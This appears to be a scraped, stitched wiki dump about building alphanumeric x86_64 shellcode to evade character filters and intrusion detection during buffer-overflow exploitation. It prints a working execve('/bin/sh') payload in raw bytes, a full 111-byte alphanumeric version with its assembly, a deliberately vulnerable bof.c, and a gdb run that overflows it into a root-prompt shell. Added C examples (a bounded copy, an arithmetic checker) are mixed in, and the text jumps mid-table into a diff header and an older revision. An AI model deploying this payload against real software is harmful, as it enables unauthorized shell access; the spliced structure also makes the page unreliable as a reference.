| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, (%{64bit},%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[byte](,%{64bit},2)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](%{64bit})</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},1)</syntaxhighlight><br />
|-<br />
| <br />
| <syntaxhighlight lang="asm">xor %{16bit}, 0x[dword](,%{64bit},2)</syntaxhighlight><br />
|}<br />
<br />
'''0x31''' is as flexible as '''0x30'''. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x31<br />
| <syntaxhighlight lang="asm">xor %{32bit}, (%{64bit})</syntaxhighlight><br />
|}<br />
<br />
'''0x32''' is just as flexible, except that the displacement applies to the source operand rather than the destination. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x32<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{16bit}</syntaxhighlight><br />
|}<br />
<br />
'''0x33''' is the reverse of 0x31 (memory source, register destination) and equally flexible. Not all permutations are included for brevity.<br />
<br />
{| class="wikitable"<br />
! Hexadecimal<br />
! Assembly<br />
|-<br />
| 0x33<br />
| <syntaxhighlight lang="asm">xor (%{64bit}), %{32bit}</syntaxhighlight><br />
|}<br />
<br />
== The rsi and rdi registers ==<br />
<br />
Combine what is known about xor with what is known about the stack: whenever data is pushed, it is accessible at %ss:(%rsp). Knowing this, another register (e.g. %rcx) can hold a copy of the stack pointer and be used, together with that stack space, to set values on some of the more difficult registers:<br />
<br />
*%rbx<br />
*%rsp<br />
*%rbp<br />
*%rsi<br />
*%rdi<br />
<br />
First, utilise push and pop to simulate 'mov':<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp; \x54<br />
pop %rcx; \x59<br />
pop %rax; \x58 (This just sets the stack pointer back)<br />
</syntaxhighlight>}}<br />
<br />
Two of the xor forms allow the index registers %rsi and %rdi to be set. For now they are zeroed out:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi; \x56<br />
xor %ss:(%rcx), %rsi; \x36\x48\x33\x31<br />
pop %r8; \x41\x58 <br />
push %rdi; \x57<br />
xor %ss:(%rcx), %rdi; \x36\x48\x33\x39<br />
pop %r8; \x41\x58<br />
</syntaxhighlight>}}<br />
<br />
Now %rsi and %rdi have been zeroed out. The special registers %r14 and %r15 can also be pushed and zeroed in this fashion. "Full control" is now gained over:<br />
<br />
*%rax<br />
*%rcx<br />
*%rdx<br />
*%rsi<br />
*%rdi<br />
*%r8<br />
*%r9<br />
*%r10<br />
*%r14<br />
*%r15<br />
<br />
So far in this sample, full control has not been obtained over:<br />
<br />
*%rsp<br />
*%rbp<br />
*%rbx<br />
*%r11<br />
*%r12<br />
*%r13<br />
<br />
As with push, controllable data is required before a register can be set; where pop is concerned, something may need to be pushed to the stack first. In this case only a zero register is required. Because of how xor works, once any register holds zero (here %rax serves as the zero register), it can be used to zero %rbx, %rsp, and %rbp if needed:<br />
<br />
To get %rbx:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax; store that value in rax<br />
xor %rax, %ss:0x30(%rcx); Null that area of stack<br />
imul $0x30,%ss:0x30(%rcx),%rbx; reads the nulled slot: 0x30 * 0 = 0<br />
imul $0x30,%ss:0x30(%rcx),%rbp; 0x30 * 0 = 0<br />
</syntaxhighlight>}}<br />
<br />
Once both the stack slot and the destination register are zero, %rax can effectively be mov'ed into %rbp:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rax,%ss:0x30(%rcx); 36 48 31 41 30<br />
xor %ss:0x30(%rcx),%rbp; 36 48 33 69 30<br />
</syntaxhighlight>}}<br />
<br />
The closest thing to incrementing and decrementing is the ins and outs instructions, whose side effect adds or subtracts 1, 2, or 4 on the %rdi register (note that in an unprivileged process these I/O instructions fault, so the side effect is rarely usable). That still leaves no general add or sub. imul on 16 and 8 bit registers can be used to emulate division. If %rsi or %rdi is not in use, there is also a "magic mov":<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
movslq %ss:0x30(%rcx), %rsi<br />
xor %rsi, %ss:0x30(%rcx); xoring the loaded value back zeroes the slot<br />
</syntaxhighlight>}}<br />
<br />
This can come in quite handy when chunking large pieces of data to 0.<br />
<br />
==Example: Zeroing Out x86_64 CPU Registers==<br />
<br />
First %rsp is pushed onto the stack and the pointer is popped into %rcx; the third instruction pops once more to realign %rsp with the address now held in %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsp<br />
pop %rcx<br />
pop %r8 <br />
</syntaxhighlight>}}<br />
<br />
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeroes %rsi by xoring it with that copy of itself, and the pop sets %rsp back relative to %rcx.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rsi<br />
xor %ss:(%rcx), %rsi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is reset to %rcx. <br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
xor %ss:(%rcx), %rdi<br />
pop %r8<br />
</syntaxhighlight>}}<br />
<br />
Zeroing out %rdx is much simpler, since %rdi is already zero:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdi<br />
pop %rdx<br />
</syntaxhighlight>}}<br />
<br />
The following push and pop set %rax to 0x30. %al is the lowest order 8 bit subregister of %rax; since the 0x30 resides entirely in %al, the xor effectively zeroes out %rax.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push $0x30<br />
pop %rax<br />
xor $0x30, %al<br />
</syntaxhighlight>}}<br />
<br />
For %rbx and %rbp, the stack slot %ss:0x30(%rcx) is first zeroed; each register is then xored into that slot and the slot xored back into the register, which leaves the register zeroed.<br />
<br />
Zero out the %ss:0x30(%rcx) stack slot:<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
Xor %rbx into the stack slot, then xor the slot back into %rbx to zero it.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbx, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbx<br />
</syntaxhighlight>}}<br />
<br />
Rezero the stack slot using %rax (reloaded with zero from %rdx).<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
push %rdx<br />
pop %rax<br />
xor %ss:0x30(%rcx), %rax<br />
xor %rax, %ss:0x30(%rcx)<br />
</syntaxhighlight>}}<br />
<br />
As before, xor %rbp into the stack slot, then xor the slot back into %rbp to zero it.<br />
<br />
{{code|text=<syntaxhighlight lang="asm"><br />
xor %rbp, %ss:0x30(%rcx)<br />
xor %ss:0x30(%rcx), %rbp<br />
</syntaxhighlight>}}<br />
<br />
= 64 bit shellcode: Conversion to alphanumeric code =<br />
* Because of the limited instruction set, the conversion requires many '''mov emulations''' via '''xor''', '''mul''', '''movslq''', '''push''', and '''pop'''.<br />
== bof.c ==<br />
{{info|This is a modified version of bof.c to allow for 200 bytes because the length of the final shellcode exceeds 100 bytes.}}<br />
{{code|text=<source lang="c"><br />
#include <stdlib.h><br />
#include <stdio.h><br />
#include <string.h><br />
<br />
int main(int argc, char *argv[]){<br />
char buffer[200];<br />
strcpy(buffer, argv[1]);<br />
return 0;<br />
}<br />
</source>}}<br />
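As an added example (not code from the page or the program it describes), here is the same program with the unbounded '''strcpy()''' replaced by a length-checked copy. The 200-byte buffer size is the page's; the '''copy_arg()''' helper and its error return are this example's own:<br />

```c
/* Added example, not code from the page: bof.c with the unbounded strcpy()
 * replaced by a length-checked copy. BUF_SIZE matches the page's modified
 * bof.c; copy_arg() and its error return are this example's own. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 200

/* Copy src into dst (dst_len bytes). Returns 0 on success, -1 when src and its
 * terminator would not fit; dst is then left empty rather than silently truncated. */
int copy_arg(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (dst_len == 0) return -1;
    if (n >= dst_len) {               /* needs n bytes plus the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);          /* bounded copy, NUL included */
    return 0;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    return 0;
}
```

It is run exactly like bof (`./bof <string>`); the 232-byte run of "A" used in the gdb session further down is rejected with an error instead of overwriting the saved return address.<br />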
<br />
== Starting shellcode (64-bit execve /bin/sh) ==<br />
{{info|This was converted to shellcode from the example in 64 bit linux assembly}}<br />
* execve('/bin/sh');<br />
{{code|text=<source lang="asm"><br />
.section .data<br />
.section .text<br />
.globl _start<br />
_start:<br />
<br />
# a function is f(%rdi, %rsi, %rdx, %rcx, %r8, %r9).<br />
# Zero %rdi, then copy the zero through the stack into %rsi and %rdx<br />
xor %rdi, %rdi<br />
push %rdi<br />
push %rdi<br />
pop %rsi<br />
pop %rdx<br />
<br />
# Store '/bin/sh\0' in %rdi<br />
movq $0x68732f6e69622f6a, %rdi<br />
shr $0x8,%rdi<br />
push %rdi<br />
push %rsp<br />
pop %rdi<br />
push $0x3b<br />
pop %rax<br />
syscall # execve('/bin/sh', null, null)<br />
# function no. is 59/0x3b - execve()<br />
</source>}}<br />
<br />
* execve('/bin/sh') <br />
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"<br />
<br />
== Shellcode Analysis ==<br />
'''Immediately before the syscall:'''<br />
* %rax is set to 0x3b<br />
* %rdi is a pointer to '/bin/sh\0'<br />
* %rsi and %rdx are null<br />
To reproduce this with alphanumeric bytes, the '''syscall''' instruction (whose machine code is not alphanumeric) must be written into memory at a location ahead of the currently executing code, so that it is eventually executed. The '''xor''' and '''imul''' instructions can then be used to set values on the registers.<br />
<br />
==Stack Analysis==<br />
{{info|These buffer dumps have been shortened for brevity and readability.}}<br />
[root@ares bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r $(perl -e 'print "A"x232;')<br />
Starting program: /home/hatter/bha/bof $(perl -e 'print "A"x232;')<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x0000000000400525 in main ()<br />
(gdb) x/500x $rsp <br />
'''0x7fffffffe3c8''': 0x41414141 0x41414141 0x41414141 0x41414141<br />
0x7fffffffe3d8: 0xffffe400 0x00007fff 0x00000000 0x00000002<br />
..........................<br />
0x7fffffffe708: 0x2f656d6f 0x68726f76 0x2f736565 0x2f616862<br />
0x7fffffffe718: 0x00666f62 '''0x41414141 0x41414141 0x41414141'''<br />
0x7fffffffe728: '''0x41414141 0x41414141 0x41414141 0x41414141'''<br />
<br />
* The formula to determine the offset to begin overwriting data from the stack pointer is '''([[return address]] + [[shellcode]] length) - %rsp'''.<br />
{| class="wikitable"<br />
|-<br />
! Operation<br />
! Value<br />
! Comments<br />
|-<br />
| <br />
| 0x7fffffffe726<br />
| [[return address]]<br />
|-<br />
| <center>'''+'''</center><br />
| 0x71<br />
| [[shellcode]] length (113 characters)<br />
|-<br />
| <center>'''-'''</center><br />
| 0x7fffffffe3c8<br />
| %rsp<br />
|-<br />
| <center>'''='''</center><br />
| '''0x3cf'''<br />
| '''Calculated offset from %rsp at time of overflow'''<br />
|}<br />
<br />
==The Offset==<br />
* To prepare for '''xor''' and '''imul''' manipulations, 0x5a is placed into %rax and %rsp is moved into %rcx.<br />
{{code|text=<source lang="asm"><br />
# Set %rcx as stack pointer <br />
# and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
</source>}}<br />
* Preparing for imul, an '''xor''' is used to place 0x0f into %rax, then push %rax to the stack.<br />
{{code|text=<source lang="asm"><br />
# Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax # 0x0f on the stack now.<br />
</source>}}<br />
<br />
* Because 0x41 * 0x0f = 0x3cf (975), the offset can be computed in purely alphanumeric form. Adjust this as the code's distance from the stack pointer changes in a given exploit. After the stack pointer is set back, the offset is stored in %rdi.<br />
{{code|text=<source lang="asm"><br />
pop %rax # set %rsp back<br />
imul $0x41, (%rcx), %edi # %rdi = 0x3cf, a "magic offset" for us<br />
</source>}}<br />
<br />
==The Syscall==<br />
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
* The next xor yields 0x0000050f, which once stored in memory (little-endian) is the byte sequence 0f 05 00 00; 0x0f 0x05 is the machine code for a '''syscall'''.<br />
{{code|text=<source lang="asm"><br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
</source>}}<br />
<br />
* The %rax register now contains 0x050f. Put 0x0f050000 at (%rcx) - then set the stack pointer back.<br />
{{code|text=<source lang="asm"><br />
push %rax<br />
pop %rax # Garbage reg<br />
</source>}}<br />
<br />
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:<br />
{{code|text=<source lang="asm"><br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
</source>}}<br />
<br />
==Arguments==<br />
===Stack Space===<br />
* Zero out a '''qword''' of data starting at %rcx + 0x30 (48 in decimal)<br />
{{code|text=<source lang="asm"><br />
# Allocate stack space<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
</source>}}<br />
<br />
===Register Initialization===<br />
* The %rdx, %rdi, and %rsi registers are used for the '''execve()''' syscall. These are zeroed out to initialize their values using the stack space previously allocated.<br />
{{code|text=<source lang="asm"><br />
# Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
</source>}}<br />
<br />
===String Argument===<br />
* '''/bin''' is placed onto the stack at the space allocated at %rcx + 0x30.<br />
{{code|text=<source lang="asm"><br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx)<br />
</source>}}<br />
* '''/sh\0''' is placed onto the stack at the space allocated at %rcx + 0x34.<br />
{{code|text=<source lang="asm"><br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) <br />
</source>}}<br />
* '''xor''' is used as a '''mov emulation''' to place '/bin/sh\0' into %rdi.<br />
{{code|text=<source lang="asm"><br />
xor 0x30(%rcx), %rdi<br />
</source>}}<br />
* Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rdi<br />
</source>}}<br />
<br />
===Final Registers===<br />
* %rsi and %rdx are '''0'''. First, push a byte to meet the sign requirement for '''movslq''', then zero %rdi.<br />
{{code|text=<source lang="asm"><br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi <br />
</source>}}<br />
* Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.<br />
{{code|text=<source lang="asm"><br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
</source>}}<br />
* %rax is set to 59 or '''0x3b''' for the '''execve()''' syscall.<br />
{{code|text=<source lang="asm"><br />
xor $0x63, %al<br />
</source>}}<br />
'''Final registers:'''<br />
* %rax = 0x3b<br />
* %rdi = pointer to '/bin/sh\0'<br />
* %rsi = null<br />
* %rdx = null<br />
<br />
==Final Code==<br />
* x86_64 alphanumeric execve('/bin/sh',null,null) - 111 bytes:<br />
'''jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c'''<br />
{{info|Some assemblers prefer the '#' character to the ';' character for comments. The user may have to find and replace to get it to assemble properly.}}<br />
{{code|text=<source lang="asm"><br />
.global _start<br />
.text<br />
_start:<br />
; Set %rcx as stack pointer <br />
; and align %rsp <br />
push $0x5a<br />
push %rsp<br />
pop %rcx<br />
pop %rax<br />
<br />
; Get magic offset and store in %rdi<br />
xor $0x55, %al<br />
push %rax ; 0x0f on the stack now.<br />
pop %rax ; set %rsp back<br />
imul $0x41, (%rcx), %edi ; %rdi = 0x3cf, a "magic offset" for us<br />
; This is decimal value 975.<br />
; If this is too low/high, suggest a <br />
; modification to xor of %al for <br />
; changing the imul results<br />
<br />
; Write the syscall <br />
movslq (%rcx,%rdi,1), %rsi<br />
xor %esi, (%rcx,%rdi,1) ; 4 bytes have been nulled<br />
push $0x3030474a<br />
pop %rax<br />
xor $0x30304245, %eax<br />
push %rax<br />
pop %rax ; Garbage reg<br />
movslq (%rcx), %rsi<br />
xor %esi, (%rcx,%rdi,1)<br />
<br />
; Syscall written, set values now.<br />
; allocate 8 bytes for '/bin/sh\0'<br />
movslq 0x30(%rcx), %rsi<br />
xor %esi, 0x30(%rcx)<br />
movslq 0x34(%rcx), %rsi<br />
xor %esi, 0x34(%rcx)<br />
<br />
; Zero rdx, rsi, and rdi<br />
movslq 0x30(%rcx), %rdi<br />
movslq 0x30(%rcx), %rsi<br />
push %rdi<br />
pop %rdx<br />
<br />
; Store '/bin/sh\0' in %rdi<br />
push $0x5a58555a<br />
pop %rax<br />
xor $0x34313775, %eax<br />
xor %eax, 0x30(%rcx) ; '/bin' just went onto the stack<br />
<br />
push $0x6a51475a<br />
pop %rax<br />
xor $0x6a393475, %eax<br />
xor %eax, 0x34(%rcx) ; '/sh\0' just went onto the stack<br />
xor 0x30(%rcx), %rdi ; %rdi now contains '/bin/sh\0'<br />
<br />
<br />
pop %rax<br />
push %rdi<br />
<br />
push $0x58<br />
movslq (%rcx), %rdi<br />
xor (%rcx), %rdi ; %rdi zeroed<br />
pop %rax<br />
push %rsp<br />
xor (%rcx), %rdi<br />
xor $0x63, %al</source>}}<br />
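The walkthrough above rests on a handful of identities (0x5a ^ 0x55, 0x41 * 0x0f, the two xor pairs that produce '/bin' and '/sh\0', the pair that produces the syscall bytes, and 0x58 ^ 0x63) and on the offset formula from the Stack Analysis table. The following C program is an added example rather than code from the page: it checks each identity from the page's own constants, verifies that both immediates of every xor pair are alphanumeric byte for byte (the reason those particular values were chosen), and confirms that the final 111-byte payload contains only alphanumeric characters. The helper names are this example's own:<br />

```c
/* Added example, not from the original page: checks the encoding arithmetic
 * the walkthrough depends on, using only the immediates and addresses the page
 * gives. An alphanumeric payload cannot carry a non-alphanumeric immediate
 * directly, so each such value is the xor of two immediates that are
 * alphanumeric byte for byte; the helpers below verify that property and the
 * offset formula from the Stack Analysis table. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* True if every byte of v's little-endian encoding (width bytes) is alphanumeric. */
int imm_is_alnum(uint64_t v, int width)
{
    for (int i = 0; i < width; i++)
        if (!isalnum((unsigned char)(v >> (8 * i)))) return 0;
    return 1;
}

/* Value left in a register that held a after "xor $b", provided both immediates
 * could appear in an alphanumeric payload; -1 otherwise. */
int64_t alnum_xor(uint32_t a, uint32_t b, int width)
{
    if (!imm_is_alnum(a, width) || !imm_is_alnum(b, width)) return -1;
    return (int64_t)(a ^ b);
}

/* Little-endian bytes of a dword as they land in memory; out gets 4 bytes + NUL. */
void dword_bytes(uint32_t v, char out[5])
{
    for (int i = 0; i < 4; i++) out[i] = (char)((v >> (8 * i)) & 0xff);
    out[4] = '\0';
}

/* Length of the payload if every byte is alphanumeric, else -1. */
int payload_alnum_len(const char *s)
{
    size_t n = strlen(s);
    for (size_t i = 0; i < n; i++)
        if (!isalnum((unsigned char)s[i])) return -1;
    return (int)n;
}

/* Offset formula from the Stack Analysis table: (return address + length) - %rsp. */
uint64_t stack_offset(uint64_t ret, uint64_t len, uint64_t rsp)
{
    return ret + len - rsp;
}

int main(void)
{
    /* The page's final 111-byte payload. */
    const char *payload = "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZ"
                          "X5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c";
    char b[5];
    printf("payload length (all alphanumeric): %d\n", payload_alnum_len(payload));
    printf("0x5a ^ 0x55 = 0x%llx\n", (unsigned long long)alnum_xor(0x5a, 0x55, 1));
    printf("0x41 * 0x0f = 0x%x\n", 0x41 * 0x0f);
    printf("(ret + len) - rsp = 0x%llx\n",
           (unsigned long long)stack_offset(0x7fffffffe726, 0x71, 0x7fffffffe3c8));
    dword_bytes((uint32_t)alnum_xor(0x3030474a, 0x30304245, 4), b);
    printf("syscall bytes in memory: %02x %02x\n", (unsigned char)b[0], (unsigned char)b[1]);
    dword_bytes((uint32_t)alnum_xor(0x5a58555a, 0x34313775, 4), b);
    printf("0x30(%%rcx) = \"%s\"\n", b);
    dword_bytes((uint32_t)alnum_xor(0x6a51475a, 0x6a393475, 4), b);
    printf("0x34(%%rcx) = \"%s\"\n", b);
    printf("0x58 ^ 0x63 = 0x%llx\n", (unsigned long long)alnum_xor(0x58, 0x63, 1));
    return 0;
}
```

'''alnum_xor()''' deliberately refuses a pair whose bytes are not all alphanumeric, which is the check to run when modifying the payload (for instance to change the imul offset): a replacement immediate that fails it would itself be stripped by the character filter the page describes.<br />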
<br />
== Successful Overflow Test ==<br />
{{info|This [[shellcode]] was tested on a modified [[Buffer_Overflows#bof.c|bof.c]] whose buffer is 200 bytes instead of 100 bytes, as the shellcode here exceeds the original buffer size.}}<br />
<br />
[user@host bha]# gdb -q ./bof<br />
Reading symbols from /home/hatter/bha/bof...(no debugging symbols found)...done.<br />
(gdb) r `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
Starting program: /home/hatter/bha/bof `perl -e 'print "jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c" . "Y"x105 . "\x26\xe7\xff\xff\xff\x7f";'`<br />
process 28444 is executing new program: /bin/bash<br />
[user@host bha]# uname -m<br />
x86_64<br />
[user@host bha]# exit<br />
exit<br />
[Inferior 1 (process 28444) exited normally]<br />
(gdb) <br />
{{exploitation}}{{programming}}{{social}}<br />
[[Category:Shellcode]]</div>DPYJulietowbaijchttps://nets.ec/index.php?title=Alphanumeric_shellcode&diff=9078Alphanumeric shellcode2012-09-19T16:23:40Z<p>DPYJulietowbaijc: /* Alphanumeric opcode compatibility */</p>
<hr />
<div><center>'''Alphanumeric [[shellcode]]''' is similar to [[ascii shellcode]] in that it is used to [[filter bypass|bypass character filters]] and [[IDS evasion|evade intrusion-detection]] during [[Buffer Overflows|buffer overflow]] [[exploitation]].</center>{{info|<center>This article documents alphanumeric code on [[#15_Byte_Architecture_Detection_Shellcode|multiple architectures]], but primarily the '''64 bit''' x86 architecture.</center>}}<br />
{{prereq|[[bitwise math]], [[assembly]] and [[shellcode]].}}<br />
<br />
= Available x86_64 instructions =<br />
{{info|This chart contains '''64-bit''' alphanumeric opcodes. 32-bit alphanumeric opcodes are available at the 32-bit [[ascii shellcode]] entry. When limited to instructions that have corresponding ASCII characters, programmers must emulate the other required instructions using only the instructions available.}}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Numeric<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
! scope="row" | 0<br />
| 0x30<br />
| xor %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 1<br />
| 0x31<br />
| xor %{32bit}, (%{64bit})<br />
|-<br />
! scope="row" | 2<br />
| 0x32<br />
| xor (%{64bit}), %{16bit}<br />
|-<br />
! scope="row" | 3<br />
| 0x33<br />
| xor (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | 4<br />
| 0x34<br />
| xor [byte], %al<br />
|-<br />
! scope="row" | 5<br />
| 0x35<br />
| xor [dword], %eax<br />
|-<br />
! scope="row" | 6<br />
| 0x36<br />
| %ss segment register<br />
|-<br />
! scope="row" | 7<br />
| 0x37<br />
| Bad Instruction!<br />
|-<br />
! scope="row" | 8<br />
| 0x38<br />
| cmp %{16bit}, (%{64bit})<br />
|-<br />
! scope="row" | 9<br />
| 0x39<br />
| cmp %{32bit}, (%{64bit})<br />
|-<br />
|}<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Uppercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | A<br />
| 0x41<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | B<br />
| 0x42<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | C<br />
| 0x43<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | D<br />
| 0x44<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | E<br />
| 0x45<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | F<br />
| 0x46<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | G<br />
| 0x47<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | H<br />
| 0x48<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | I<br />
| 0x49<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | J<br />
| 0x4a<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | K<br />
| 0x4b<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | L<br />
| 0x4c<br />
| 64 bit reserved prefix<br />
|-<br />
! scope="row" | M<br />
| 0x4d<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | N<br />
| 0x4e<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | O<br />
| 0x4f<br />
|64 bit reserved prefix<br />
|-<br />
! scope="row" | P<br />
| 0x50<br />
|push %rax<br />
|-<br />
! scope="row" | Q<br />
| 0x51<br />
|push %rcx<br />
|-<br />
! scope="row" | R<br />
| 0x52<br />
|push %rdx<br />
|-<br />
! scope="row" | S<br />
| 0x53<br />
|push %rbx<br />
|-<br />
! scope="row" | T<br />
| 0x54<br />
|push %rsp<br />
|-<br />
! scope="row" | U<br />
| 0x55<br />
|push %rbp<br />
|-<br />
! scope="row" | V<br />
| 0x56<br />
|push %rsi<br />
|-<br />
! scope="row" | W<br />
| 0x57<br />
|push %rdi<br />
|-<br />
! scope="row" | X<br />
| 0x58<br />
|pop %rax<br />
|-<br />
! scope="row" | Y<br />
| 0x59<br />
|pop %rcx<br />
|-<br />
! scope="row" | Z<br />
| 0x5a<br />
|pop %rdx<br />
|-<br />
|}<br />
<br />
<br />
{| class="wikitable" style="text-align:center; width:60%;"<br />
|+ Lowercase<br />
|-<br />
! scope="col" | ASCII<br />
! scope="col" | Hex<br />
! scope="col" | Assembler Instruction<br />
|-<br />
<br />
! scope="row" | a<br />
| 0x61<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | b<br />
| 0x62<br />
|Bad Instruction!<br />
|-<br />
! scope="row" | c <br />
| 0x63<br />
|movslq (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | d<br />
| 0x64<br />
|%fs segment register<br />
|-<br />
! scope="row" | e<br />
| 0x65<br />
| %gs segment register<br />
|-<br />
! scope="row" | f<br />
| 0x66<br />
| 16 bit operand override<br />
|-<br />
! scope="row" | g<br />
| 0x67<br />
| 16 bit ptr override<br />
|-<br />
! scope="row" | h<br />
| 0x68<br />
|push [dword]<br />
|-<br />
! scope="row" | i<br />
| 0x69<br />
|imul [dword], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | j<br />
| 0x6a<br />
|push [byte]<br />
|-<br />
! scope="row" | k<br />
| 0x6b<br />
|imul [byte], (%{64bit}), %{32bit}<br />
|-<br />
! scope="row" | l<br />
| 0x6c<br />
|insb (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | m<br />
| 0x6d<br />
|insl (%dx),%es:(%rdi)<br />
|-<br />
! scope="row" | n<br />
| 0x6e<br />
|outsb %ds:(%rsi),(%dx)<br />
|-<br />
! scope="row" | o<br />
| 0x6f<br />
